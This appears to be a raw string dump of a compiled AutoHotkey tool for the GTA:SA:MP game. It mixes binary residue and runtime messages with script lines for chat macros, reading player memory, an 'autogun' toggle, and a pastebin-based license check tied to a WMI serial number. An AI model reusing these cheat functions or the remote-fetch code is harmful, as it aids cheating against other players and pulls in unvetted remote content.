        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "D956P",
        "RegEx",
        "REG_FULL_RESOURCE_DESCRIPTOR",
        "tjD9t$DuC",
        "TrayTip",
        "GetKey",
        "A_A^A\\[]",
        "L$xf92",
        "<BqtIA",
        "t'ffff",
        "RemoveMenu",
        "SetControlDelay -1",
        "R6032",
        "8L$2H",
        "`string'",
        "\\$ UVWATAUAVAWH",
        "LockServiceDatabase",
        "AlwaysOff",
        "D$0H;",
        "t$fff",
        "@A\\_^",
        "number is too big",
        "0><[cZUg^>",
        "mixerClose",
        " (.*)\") == -1)",
        ".?AVCStringWCharFromChar@@",
        "%-15s",
        "{Blind}%s%s{%s DownR}",
        "Local Variables for %s()%s",
        "VVVVVVVV",
        "ActiveX",
        "|$xH;",
        "SetMenuDefaultItem",
        "GetPixel",
        "Logoff",
        "GetLastInputInfo",
        "t=D8w",
        "v(H;}",
        ":?:/q::",
        "GuiEvent",
        "RegClass",
        "NumpadMult",
        "gfffA",
        "@VATAVAWH",
        "Javanese",
        "MoveFileW",
        "SetTitleMatchMode 2",
        "d$XE3",
        "D$DHc",
        "A_A^A]A\\_^[",
        "AppStarting",
        "v%L;g",
        "YearMonth",
        "if findline(\"",
        "loop, parse, allrp, `n",
        "CorExitProcess",
        "- not enough space for thread data",
        "*D$@f",
        "@A]A\\_",
        "[[[[[[[[[[[[[[[[[[[[[",
        "AltTab",
        "Floor",
        "MouseClickDrag",
        "WATAVH",
        "tN @m",
        "FillRgn",
        "xA_A^A][",
        "RtlPcToFileHeader",
        "This variable has not been assigned a value.",
        "0A\\_^",
        "getprocessid(){",
        "MessageBeep",
        "An environment variable is being accessed; see #NoEnv.",
        "M8fD9!u",
        "FileGetSize",
        "IsOptional",
        "`eh vector constructor iterator'",
        "hHmst",
        "operator",
        ".?AVMetaObject@@",
        "Could not extract script from EXE.",
        "NumpadDown",
        "Old_South_Arabian",
        "d$0fA9E",
        "HcHTH",
        "D8h(u",
        "USVWATAVH",
        " A]_^",
        "Syloti_Nagri",
        "T$hI;",
        "D8l$0t",
        "SendInput /me ",
        "CompanyName",
        "%0.2f",
        "u(I;t$0}!H",
        "WinMinimizeAllUndo",
        "ExitReason",
        "tIH9=}",
        "R6019",
        "|$ AT",
        "SetEndOfFile",
        "+h->|",
        "This DllCall requires a prior VarSetCapacity.",
        "ObjectLink",
        "Numpad0",
        "\\$8+\\$0f",
        "|$PM3",
        "GetGUIThreadInfo",
        "FD8K#u",
        "H;L$0vR",
        "url:=\"https://pastebin.com/raw/04TKQkE1\"",
        "v0H;s",
        "RunAs",
        "Invalid class name.",
        "REG_QWORD",
        "&rdquo;",
        " (.*)\\Q[\\E(.*)\\Q]\\E\", id)",
        "ThisHotkey",
        "ToolTip",
        "yacute",
        "D$@D8h",
        "index := A_Index - line",
        ")t$0f",
        "fE97M",
        "ExitWindowsEx",
        "Invalid function declaration.",
        "GetCapacity",
        "D9T$p",
        "GetIconInfo",
        "[[[[[[[",
        "RunAs: Missing advapi32.dll.",
        "pA]A\\_^[",
        "EnfA9",
        "tJE8h",
        "%s%s %s %s",
        "Invalid single-line hotkey/hotstring.",
        "[[[[[[VVVVVVV[[[[[[[[[",
        "MainWindow",
        "TabRight",
        "open:=1",
        "R6010",
        "D8E=t",
        "d$Pff",
        "CreateDirectoryW",
        ".xJ>Hf",
        " H;{0}",
        "H;}0r",
        "FormatTime",
        "IconNumber",
        "A^A\\]",
        "L$ USWH",
        "IsSuspended",
        "\\$XI;",
        "L$P$=",
        ":qt f",
        "sleep 20",
        "Rename failed (name too long?).",
        "RawWrite",
        "VATAUAVAWH",
        "SetTitleMatchMode Fast",
        "R6030",
        "Case/Default must be enclosed by a Switch.",
        "PtInRect",
        "f98uPH",
        "Class may be overwritten.",
        "bbbbb",
        "Unknown",
        "L;-~3",
        "MultiByteToWideChar",
        "@t&Ic",
        "USWAVH",
        "D$XfD9 t",
        "__pascal",
        "t$8E3",
        ".?AUIServiceProvider@@",
        "|$ H;",
        ":?:/relog::",
        "? StrGet(&buf, numBytes)",
        "Expression too long",
        "SizeWE",
        "ComEvent",
        "Clipboard",
        "\\$XfA9m",
        "Background",
        "l$0E3",
        "ReadFile",
        "Link Source",
        "u2D9%",
        "u_f9E",
        "Expand",
        "0x%08X - ",
        "&User Manual",
        "unrecognized character after (?P",
        "T$0H+",
        "NO_START_OPT)",
        "msctls_statusbar321",
        "Destroy",
        "epA_A^A]A\\]",
        "81u+fA9h",
        "The current thread will exit.",
        "kE>fvw",
        "Missing \")\" before \":\"",
        "patrol() {",
        "0123456789ABCDEF",
        "MinIndex",
        "D8|$8t",
        "cntrl",
        "waveOutGetVolume",
        "SHGetMalloc",
        "Note: To avoid this message, see #SingleInstance in the help file.",
        "C HcC A",
        "D8c#u",
        "IfGreater",
        "9IcK$H",
        "Malayalam",
        "Browser_Forward",
        "     Specifically: %s",
        "iacute",
        "Nonexistent menu item.",
        "gdiplus",
        "A^A\\_",
        "bad allocation",
        "ToolWindow",
        "u5fE9L$",
        "value",
        " A_A^A\\_]",
        "IcF H",
        "rQf99t'H",
        "l$ WH",
        "Match",
        "Modify",
        "<+u-A",
        "GetTimeFormatW",
        "Elapsed",
        "fD9ly",
        "@UWAVAW",
        "v(L;w",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "USWATH",
        "Browser_Search",
        "v'H;o",
        "v%H;s",
        "I)l$ E",
        "040904b0",
        "GetMessagePos",
        "IconTip",
        "T$TA;",
        "ifWinNotActive GTA:SA:MP",
        "A^A]_^]",
        "z?aUY",
        "\\$ VATAU",
        "WIN_XP",
        "PCRED",
        "WinClose",
        "IfLessOrEqual",
        "group",
        "RtlVirtualUnwind",
        "l$ WAUAVH",
        "` AUH",
        "USWATAUAWH",
        "Property",
        ")>6{1n",
        "@8{^tY9{@",
        "SetDlgItemTextW",
        "Finally",
        "ahk_autosize",
        "|$8H;",
        "L$&H;",
        "8ut H",
        "<HIcO`I",
        ": %nick1%",
        "NumpadAdd",
        "MulDiv",
        "Ignore",
        "if !autogun",
        "LoopFileFullPath",
        "Exist",
        "BassBoost",
        "rp := RegExReplace(rp, \"!\", \"{!}\")",
        "|$0E3",
        "UA>N0Wl",
        "TimeIdleMouse",
        "Missing \"{\"",
        "9uuCL",
        "/ErrorStdOut",
        "u*A8|$",
        "*.txt",
        ";\\$ |",
        "H[><y5",
        "A_A^[",
        "=imb;D",
        "Browser_Stop",
        "|$q@8",
        "McE I",
        "@A_A^_^[",
        "Syriac",
        "LD@Hc",
        "closed",
        "CreateFontW",
        "otilde",
        "D8d$Pu",
        "L$DD8L$R",
        "fD90u",
        "\\$P@2",
        "f90u'95",
        "d$`t)f",
        "tI@8p#u",
        "KERNEL32.dll",
        "L$ WATAUAVAWH",
        "goto True",
        "GuiControl, 1:, M5, % ahk[i+2]",
        "LoadPicture",
        "L;5#>",
        "rKLcM",
        "t$@Hc",
        "SelectObject",
        "TUUUU",
        "8qux3",
        "return prread(getprocessid(), player + 0x540, \"float\")",
        "Component Doesn't Support This Control Type",
        "uNffffff",
        "Microsoft Visual C++ Runtime Library",
        "fD9/H",
        ".D8mjt",
        "t0H95",
        "WideCharToMultiByte",
        "LookupPrivilegeValueW",
        "D$@E:",
        "t$8fA",
        "@Qm6t",
        "FileReadLine",
        "ELSE with no matching IF",
        "ImageList",
        "LoopRegTimeModified",
        "Multi",
        "Y>kX>M",
        "fD91t",
        "0A^A]A\\_^",
        "L$ UVWATAUAVAWH",
        "InStr",
        "COMCTL32.dll",
        "Hebrew",
        "recursive call could loop indefinitely",
        "IsByRef",
        "fD9!t",
        "WinDelay",
        "MinMax",
        "t$0H;{8|.H",
        "EnumWindows",
        "D$@H+",
        "This class definition is nested too deep.",
        "(;s r",
        " delete[]",
        "If !WinActive(\"GTA:SA:MP\") {",
        "`udt returning'",
        "L$$fE",
        "H;Q wwf",
        "fJBGo",
        "%s\\%s",
        "Syntax error in class definition.",
        "Z HcJ`H",
        "L$pH+",
        "Cross",
        "@SUAUAV",
        "ToggleEnable",
        "8A_A]",
        "NowUTC",
        "GetCursorInfo",
        "GetCurrentThreadId",
        "MouseMove",
        "SetFileAttributesW",
        "return -1",
        "RemoveDirectoryW",
        "fD97t",
        "Progress",
        "MouseDelay",
        "extends",
        "AddRef",
        "CopyFileW",
        "FormatFloat",
        "SetTimer",
        "Gui, 3:show, x%xag% y%yag% w150 NoActivate, ",
        "StringTrimLeft",
        "Hotstring",
        "u(fff",
        "DestroyAcceleratorTable",
        "if StatusAC",
        "return output := RegExReplace(RegExReplace(A_LoopField, \"U)^\\[\\d{2}:\\d{2}:\\d{2}\\]\"), \"Ui)\\{[a-f0-9]{6}\\}\")",
        "XA_A^",
        "gui, 4:color, Black",
        "; <COMPILER: v1.1.37.01>",
        "8L$0H",
        "Tamil",
        "D$\\}D",
        "f9lT0u%",
        "?:u8H",
        "l$XfE",
        "@SVWATAUAVAWH",
        "LoadLibraryW",
        "SetLastError",
        "GetMenuItemInfoW",
        "Start",
        "aacute",
        "GetSysColor",
        "@UWAT",
        "ToUnicodeEx",
        "?!5WOo",
        "L$`H3",
        "utHc]",
        "Katakana",
        "RShift ",
        "toM;e",
        "ReleaseDC",
        ":}u\"A",
        "?)uxI",
        "H+L$(H",
        "FlushFileBuffers",
        "t$HA+",
        "GetTempPathW",
        "ImageSearch",
        "BE;CX|",
        "LcCxH",
        "NumpadEnd",
        "mciSendStringW",
        "USWATAUAVH",
        "tED8k",
        "GetClipboardFormatNameW",
        "u5fE9|$",
        "8ERCPu",
        "Hotkeys/hotstrings are not allowed inside functions.",
        "Combo",
        "\"%s\" is not allowed as a prefix key.",
        "\\$XL;",
        "@SUWATAVH",
        "@A^][",
        "@8l$8t",
        "A]A\\^",
        "IfWinNotActive",
        "L$@E2",
        "Modifiers (Hook's Logical) = %s",
        "CreateStreamOnHGlobal",
        "@\"=c(",
        "A_A]^[",
        "L$XfD9!u",
        "ImageList_AddMasked",
        "Permit",
        "GdiplusStartup",
        "USVWATAUH",
        "H;;tCH",
        "@SUWH",
        "t,f98t'H",
        "l$H@8~xug",
        "BarBreak",
        "GuiControl, 4:+cGreen +Redraw, apt",
        "GetChatLine(line:=0) {",
        "u_fE9",
        "Saturday",
        "<7H;} r+H",
        "D+API",
        ")|B?d!",
        "@A^A\\]",
        "IfNotEqual",
        "RegExMatch",
        "WantF2",
        "FreeEnvironmentStringsW",
        "Lj[;>",
        "L$qfD9+t}H",
        "L$099u",
        "SendInput /r [%tag%]%A_Space%",
        "CreateStatusWindowW",
        "CreatePopupMenu",
        "NumBatchLines",
        "#HotkeyInterval",
        "t(H+D$`L",
        "(A_A^A\\^",
        "D$H9D$@t",
        ".?AVEnumBase@@",
        "HcH<H",
        "The maximum number of InputBoxes has been reached.",
        "+\\$|A",
        "T$@H;",
        "global id, rank, nick, path, open:=1, name, fam, org, bstatus, id, day, month, year, hour, min",
        "SendDlgItemMessageW",
        ".?AVFileObject@@",
        "&Hotkeys and their methods",
        "April",
        "@UVWATAUAVAWH",
        "between",
        "t$ u(",
        "%s%ws",
        "`typeof'",
        "Devanagari",
        "internal error: missing capturing bracket",
        "Enabled Timers: %u of %u (%s)",
        "@WATAUAVAW",
        "IfNotInString",
        "GetExitCodeThread",
        "Lower",
        "sendinput, {f6}/drag%A_Space%",
        "H+K8J",
        "joyGetPosEx",
        "Ramdisk",
        "H;n0|",
        "&Yuml;",
        "D1:Hc",
        "H;5%l",
        "ole32.dll",
        "return (type = \"Str\")",
        "OleUninitialize",
        "ComObjRef",
        "v'H;k",
        "IfEqual",
        "Wednesday",
        "CfA9,$u",
        "fD93t+L",
        "f9t$p",
        "yapt:=A_ScreenHeight - 40",
        "@UVWATAV",
        "A^A]][",
        "USVWAVH",
        "8&u/H",
        "\\$gm?",
        "mixerSetControlDetails",
        "Qffffff",
        "NOPQRSTUVWXYZ[\\F]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]^]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]_`aaaaaaaabccdefghijklmno\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"pqqqqqqqqqqqqqqqqrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr]]stuvwwxyz{|}~",
        "Relative",
        "GetAsyncKeyState",
        "JoyName",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "\\p{Nd}",
        "t$0fD#",
        "u+H9k",
        "D$(D;l$ s",
        "AU3_Spy.exe",
        "LastFound",
        "GetMenuItemID",
        "Desktop",
        "L$ UVWH",
        "HcT$0L",
        "Ic@,A",
        "L$8+L$0",
        "StatusCD",
        ".?AV__non_rtti_object@std@@",
        "L9s uX@8k:uRD8k?uL@",
        "D$8Hc",
        "Igrave",
        "%0.*f",
        "H9{8H",
        "`local static thread guard'",
        "?QY^&",
        "pcre_callout",
        "9H ~MH",
        "&hellip;",
        "PostMessageW",
        "An object.",
        "SetRegView",
        "ProductName",
        "9s vE3",
        "fD9d$ ",
        "fD9,Ct'H",
        "RP := RegExReplace(RP, \"\\Q$\\Eid\", id)",
        "GlobalSize",
        "Il?333333c?",
        "times",
        "u-9s,t",
        "t=ffffff",
        ")t$PL",
        "EnumResourceNamesW",
        "@WAUAVH",
        "GetStartupInfoW",
        "HcD$@H",
        "MButton",
        "VD$pf",
        "&ndash;",
        "For more details, read the documentation for #Warn.",
        "GetDeviceCaps",
        "H;L$h",
        "#SingleInstance, force",
        "D9qH~uA",
        "cmd:=RegExReplace(cmd, ogr1, \"start\")",
        "Gui, 4:Destroy",
        " H;{8}",
        "nD$0D",
        "CreateAcceleratorTableW",
        "#32770",
        "D8 t=D",
        "IsSet",
        "v'I;]",
        "D$PIc",
        "IPAddress1",
        "GuiControl, 3:+cGreen +Redraw, agun",
        "R6018",
        "d$`fE;",
        "'fD9!u",
        "t$PHc",
        "Message",
        "Numpad1",
        "#Warn",
        "InstallDir",
        "L$`E3",
        "Network",
        "GetObjectW",
        "v-H;s",
        "RightClick",
        "H9i8u",
        "D$XH;",
        "         (((((                  H",
        "SetForegroundWindow",
        "if !id:=getid()",
        "T$pH;",
        "Group name too long.",
        "L9|$8I",
        "fD9?tVH",
        "BlockInput",
        "LWINUP",
        "\"%s\" requires that parameter #%u be non-blank.",
        "HKEY_USERS",
        "GetKeyboardLayout",
        "D9|$X",
        "0iN>/",
        "XButton1",
        "h`H9up",
        "A80uII",
        "NOTE: Only the script's own keyboard events are shown",
        "D$PH9D$p",
        "tgE8h",
        "A_A^A]A\\^",
        "REG_BINARY",
        "ListView",
        "L9=J-",
        "The maximum number of MsgBoxes has been reached.",
        "bb[[bb",
        "GetModuleFileNameExW",
        "HScroll",
        "HA_A^A]A\\_^][",
        "IsWindow",
        "xh:=A_ScreenWidth - ( A_ScreenWidth / 4 )",
        "fD93t93",
        "Combobox",
        "v6H;s",
        "@80t)H",
        "D$p@2",
        "H;K0u",
        "URLDownloadToFile",
        "eEfgGaA",
        "D9B(tBH",
        "RtlUnwindEx",
        "Topmost",
        "A_A]A\\^]",
        "SetWindowLongPtrW",
        "Numpad5",
        "tZL;%,&",
        "FileExist",
        "-+0 #",
        "Tai_Tham",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "CDRom",
        "uNf9C",
        "L$XIc",
        "%04d%02d%02d%02d%02d%02d",
        "Action: <%-0.400s%s>%s",
        "tnLcV",
        "D8n#u",
        ")t$ H",
        "WheelDown",
        "Global variables must not be declared in this function.",
        "PA]_]",
        "WebRequest := ComObjCreate(\"WinHttp.WinHttpRequest.5.1\")",
        "|$HI;",
        "t$t@2",
        "A\\_^][",
        "@A^A]A\\",
        "Hc}Dt",
        "CtrlBreak",
        "u<E8|$",
        "UVWATAWH",
        "{Click",
        "#DerefChar",
        "ShowDropDown",
        "ComObject.Enumerator",
        "Submit",
        "LShift ",
        "|$DA;",
        "\"\"\"\"\"/",
        "\\$ UVW",
        "yap:=A_ScreenHeight / 2 + 75",
        "Encoding",
        "\\$xIc",
        "u|D9}",
        "February",
        "+D$0Hc",
        "Gothic",
        "Hffff",
        "sendchat(A_LoopField)",
        "if(id==lid)",
        "@.rsrc",
        "A_A^^[",
        "pA^A]A\\_^",
        "t/fD9k",
        "9{H~23",
        "Static",
        "|$`fD",
        "Parameter #4 invalid.",
        "&View",
        "Prefix key is down: %s",
        "kernel32.dll",
        "A(fE9(u",
        "@8s t",
        "t$f9E",
        "l$DE3",
        "t4@8-x",
        "WinSetTitle",
        "~pffff",
        "|$8E3",
        "D$PH;D$p",
        "fD9.u>E",
        "EnterCriticalSection",
        "Not allowed as an output variable.",
        "DetectHiddenWindows",
        ".{Enter}",
        "L;t$xrKH",
        "WaNd?",
        "GetUpdateRect",
        "t]@8k",
        "\\$HfE",
        "Break",
        "IPAddress2",
        "@A_A^A]A\\_",
        "sendchat(\"/pt \" id2)",
        "tBffffff",
        "T$ E3",
        "T$(E3",
        "CLSIDFromString",
        "@A_A]A\\_]",
        "not in",
        "command option was not enabled in the original script.",
        "Limit",
        "Range",
        "D$@A;",
        "GetStringTypeExW",
        "t.fffffff",
        "return 1",
        "MouseMoveOff",
        "NumpadDot",
        "CE;cX}6L",
        "Inscriptional_Parthian",
        "GetLastError",
        "u4f9E",
        "ntdll.dll",
        "GetConsoleCP",
        "Inherited",
        "SING error",
        "AltTabMenuDismiss",
        "RTrim",
        "O0HcQ",
        "IsDebuggerPresent",
        "IfWinActive",
        "]>)2X",
        "if !input",
        "LShift",
        "CheckRadioButton",
        "t\\HcCH",
        "UnlockServiceDatabase",
        "\\$T+t$p+\\$t+t$H+\\$LH",
        "H9{0u",
        "RegExmatch(hp, \"(.*)\\.\", shp)",
        "EndReason",
        "WinMinimize",
        "XButton1::",
        "CIcD$`H",
        "HH:mm:ss",
        "\\$ UATAVH",
        "EWHcM",
        "y\\PD>!",
        "t$ WATAUAVAWH",
        "StringTrimRight",
        "RegEnumKeyExW",
        "UNICODE",
        "LcC0H",
        ":uu,f",
        "@8w#u",
        "SUVWH",
        "D$(fD9",
        "A9vdu",
        "D$@Lc",
        "t%H;s",
        "HcD$\\",
        "tKfA;",
        "OutputDebugStringW",
        "+M<7>",
        "j?{$*",
        "gui, 1:add, text,  cWhite vM1 x0 w250 Center, % ahk[i-2]",
        "GetClipBox",
        "First",
        "Carian",
        "TranslateAcceleratorW",
        "CONTROLDOWN",
        "GetLayeredWindowAttributes",
        "t$ I+",
        "CloseServiceHandle",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "SetWorkingDir",
        "CONTROLUP",
        "A_A^A]_]",
        "Tai_Le",
        "e+000",
        "FindAnywhere",
        "CreateIconFromResourceEx",
        "T$H8Z#u",
        "l$X@2",
        "kernel32",
        "InProgress",
        "`A\\][",
        "Reload",
        "SUWAUAVH",
        "RawSet",
        "Launch Error (possibly related to RunAs):",
        "@SVWH",
        "Lycian",
        "}/+}'C",
        "Select",
        "0A_A^A]A\\_",
        "L9l$p",
        "Gui, launcher:Show, w311 h381, WantedLab",
        "HeapSize",
        "AdjustWindowRectEx",
        "<$0u%",
        "ucirc",
        "SendInput {f6}^a+{del}%text%{enter}",
        "middot",
        "t\"E8|$&t",
        "\\p{Xwd}",
        "LoadResource",
        "MonitorPrimary",
        "A \"return\" must be encountered prior to this \"}\".",
        "\\$ VATAUH",
        "pA]A\\_][",
        "GetClipRgn",
        "E>nEA",
        "sleep 1000",
        "dwmapi.dll",
        "d$8E3",
        ".?AVComEvent@@",
        "uzKs@>",
        "@UATH",
        "POSIX named classes are supported only within a class",
        "Invalid option.",
        "|$pfD",
        "t%fD9?t",
        "<>=/|^,:",
        "Acirc",
        "MS Shell Dlg",
        "A_A^A\\_^][",
        "8A^A\\][",
        "`managed vector copy constructor iterator'",
        "9D$XufE",
        "hp:=GetHP()",
        "IcK$H",
        "This parameter contains a variable name missing its ending percent sign.",
        "A;9}+M",
        "H ATH",
        "SetTimer, apt, 1",
        "sc%03X",
        "OnMessage",
        "#KeyHistory 0",
        "t$pI;",
        "Ethiopic",
        "RegExMatch(cmd, \"(.*)start\", ogr)",
        "L9|$8u",
        "exitapp",
        "is not",
        "StrPut",
        "l$pL;t$`",
        "u@D85",
        "inveh() {",
        "H;WHr",
        "('8PW",
        "<>=/|^,:*&~!()[]{}+-?.\"",
        "epA_A^A]A\\_^]",
        "Drive",
        "D9%U6",
        "Shell_NotifyIconW",
        "`eh vector copy constructor iterator'",
        "|$pE3",
        "CoordModeToolTip",
        "GetExitCodeProcess",
        "Treble",
        "d$@E3",
        "(t$`I",
        "D8e_ue",
        "Gui, launcher:Add, Picture, x32 y85 w250 h220 , C:\\PA\\Logo.ico",
        "GetSystemDefaultUILanguage",
        "erroffset passed as NULL",
        "Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.",
        "](tfA",
        "SizeNWSE",
        "L$ H+",
        "`local vftable constructor closure'",
        "L$PfI",
        "l$`A;E s",
        "l$ E3",
        "#ClipboardTimeout",
        "VVVVVVV",
        "OriginalFilename",
        "REG_RESOURCE_LIST",
        "A9G|}",
        "0A]A\\_",
        "R6027",
        "D8w#u",
        "numbers out of order in {} quantifier",
        "#ErrorStdOut",
        "XA^[H",
        "D9l$l",
        "DefaultListView",
        "MenuGetName",
        "H9k0u",
        "@SVWAVH",
        "SUVATAUAVH",
        "`h````",
        "StringReplace",
        "HA_A]_^][",
        "if !RegExMatch(getchatline(0), \"",
        "t>D95",
        "D$0H9C0",
        "GetVersionExW",
        "DEFINE",
        "Media_Play_Pause",
        "WinActivate",
        "d$xL9k",
        "@UAUAVH",
        "\\c must be followed by an ASCII character",
        "<>=/|^,:*&~!()[]{}+-?.",
        "&lsquo;",
        "fE9<$",
        "D$@Hc",
        "ChooseString",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "LoadAcceleratorsW",
        "%c              ",
        "NoTab",
        "E9<$t",
        "HcG H",
        "NoSort",
        "VWAUAVAWH",
        "<$+u<I",
        "Cuneiform",
        "@WATAUH",
        "|$<+|$4H",
        " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~",
        "GetLocalTime",
        "`managed vector constructor iterator'",
        "Menu name too long.",
        "qS>g?h3",
        "v'H;s",
        "|$0-H",
        "range out of order in character class",
        "SetControlDelay",
        "KeyDelay",
        "Gosub",
        "iniread, x, rp.ini, settings, x",
        "\\P{Xwd}",
        "tA@8p#u",
        "REG_DWORD",
        ".exe.bat.com.cmd.hta",
        "ChangeClipboardChain",
        "SetStdHandle",
        "CreatePolygonRgn",
        "SetTimer, cmenu, 1",
        "!|$XI",
        "Error",
        "Parameter #3 must be blank in this case.",
        "3>fvw",
        "__based(",
        "__eabi",
        "Control",
        "H;=j@",
        "IsFunc",
        "Hanunoo",
        "#Persistent",
        "A^_^][",
        "WeaponId() {",
        "L$xfA9",
        "SizeNESW",
        "|L^\\u",
        "@8w#H",
        "fD9tN",
        ":uUfB",
        "A;\\$ r$H",
        "|$@-H",
        "L$PE3",
        "IsWow64Process",
        "https://autohotkey.com",
        "L9q0u",
        "Key := objOSItem.SerialNumber",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "A^_[]",
        "bp(=>?g",
        "A__^[",
        "internal error: opcode not recognized",
        "lic_check()",
        "T$ L+",
        "D8p(u",
        "0A^A]A\\_[",
        "if !A_IsCompiled",
        "StrReplace",
        "} ffffff",
        "This \"For\" is missing its \"in\".",
        "rHH+D$`LcM",
        "L$PI;",
        "|$0.u",
        "sleep 3000",
        "?+>^m",
        " A^A]_",
        " t?D9",
        "LAlt ",
        "SetBase",
        "acirc",
        "T$(A+",
        "iniread, rank, rp.ini, settings, rank",
        "ThisMenu",
        "Disable",
        "SHEmptyRecycleBinW",
        ";(uBE",
        "Coptic",
        "RETRY",
        "@UATAUAVAWH",
        "@UVATAUAWH",
        "VarFileInfo",
        "ALTUP",
        "G:f9C",
        "GdiFlush",
        "e`A_A^A]A\\_^]",
        "ComObjArray",
        "FindString",
        "IsMenu",
        "%04hX",
        "sendinput {a down}",
        "uYfE9",
        "--------------------------------------------------",
        "\\\" $*",
        "sendchat(\"/drag \" id2)",
        "D$ L+",
        "D;P(|",
        "FileTimeToLocalFileTime",
        "SetWindowTextW",
        "objWMIService := ComObjGet(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")",
        "Native",
        "H9k@@",
        "Catan",
        "GuiHeight",
        "unknown POSIX class name",
        "H;{0|+H",
        "GetProcessWindowStation",
        "L$8u%",
        "Too many status bars.",
        ".?AVComEnum@@",
        "#MaxThreadsPerHotkey",
        "WIN_VISTA",
        "x ATH",
        "Unexpected %",
        "GetDiskFreeSpaceW",
        "SOFTWARE\\AutoHotkey",
        "CHcB`H",
        "GetFileType",
        "Minimize",
        "<^>^<!>!<+>+<#>#",
        "|$89^",
        "GetAncestor",
        "StrCmpLogicalW",
        "UpdateWindow",
        "L$fH;",
        "\\p{Ll}",
        "D$HE3",
        "disallowed Unicode code point (>= 0xd800 && <= 0xdfff)",
        "dddd, MMMM dd, yyyy",
        "RegCloseKey",
        "XA]A\\][",
        "Lcd$LI",
        "HcD$T",
        "u*8D$qt$D9{",
        "Illegal parameter name.",
        "..om?",
        "FileObject",
        "au`fE9J",
        "WinWaitActive",
        "WATAUH",
        "f9D$p",
        "StoreCapslockMode",
        "A_A]A\\_]",
        "0A^A\\[",
        "\\$ UWAVH",
        " A_A^A]A\\_",
        "Xusf9~",
        "WheelRight",
        "LoopFileDir",
        "This line does not contain a recognized action.",
        "u&8T$LD",
        "A8F#u",
        "SetNumlockState",
        "SysDateTimePick32",
        "`RTTI",
        "gui, launcher:font, s16",
        "FillRect",
        "&bdquo;",
        "agun() {",
        "@SVWATAUAVH",
        "CreateDialogIndirectParamW",
        "T$`E3",
        "+-*&~!",
        "GetUserObjectInformationW",
        "Vertical",
        "T$PD;",
        "fE;)sKM",
        "T$xHc",
        ".pdata",
        "\\$\\E;",
        "%s  (a %s variable%s)",
        "Password",
        "Failed to open file.",
        "F>qUxv",
        "fD;*ssI",
        "GetMonitorInfoW",
        "CharUpperW",
        "D\\@fA",
        "&oelig;",
        "|$(tc",
        "GetProcessImageFileNameW",
        "v'L;c",
        "gui, 5:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20",
        "RP := RegExReplace(RP, \"\\Q$\\Efam\", fam)",
        "Mongolian",
        "PriorHotkey",
        "Ctrl+R",
        "t0D8w#u",
        "\\$0um3",
        "conditional group contains more than two branches",
        "sendinput {RButton down}",
        "Declaration conflicts with existing var.",
        "A^A]A\\^]",
        "Key History has been disabled via #KeyHistory 0.",
        "t$ WATAV",
        "Launch_Media",
        "Screen",
        "t$ D;>u",
        "ShowWindow",
        "RP := RegExReplace(RP, \"\\Q$\\Eorg\", org)",
        "D8l$x",
        "c [1>H'",
        "D8u:t\"H;",
        "Consolas",
        "Missing \"}\" before \":\"",
        "t/f93u*",
        "A^A\\_][",
        " !\"#$",
        "|$0E2",
        "Out of memory.",
        "<>=/|^,:*&~!()[]{}+-?.\"'\\;`",
        "H9\\$Ht",
        "N3`d?",
        "CoordModeCaret",
        "Unknown class.",
        "[[VVVVVVVVVVVVVVVV",
        "Dialog",
        "malformed \\P or \\p sequence",
        "Window",
        "GuiControl, 5:,pfam, ",
        "ControlSetText",
        "%0.6f",
        "<$,u_I",
        "MyDocuments",
        "While",
        "E9l$(t",
        "RegisterHotKey",
        "SoundPlay",
        "#MaxMem",
        "NotReady",
        "LWINDOWN",
        "Tab name doesn't exist yet.",
        "Duplicate function definition.",
        "9CDtJ",
        "upper",
        "t$ WATAVH",
        "IsAppThemed",
        "GetEnvironmentVariableW",
        "f;D$@ug",
        "if %s %s %s and %s",
        "Caption",
        "Nonexistent hotkey variant (IfWin).",
        ".?AVTextFile@@",
        "Variable name too long.",
        "DetectHiddenWindows On",
        "A^A]A\\^[",
        "InputThenPlay",
        "H;D$p",
        "tooltips_class32",
        "\"H958",
        "GetSysColorBrush",
        "if hud",
        "Logical",
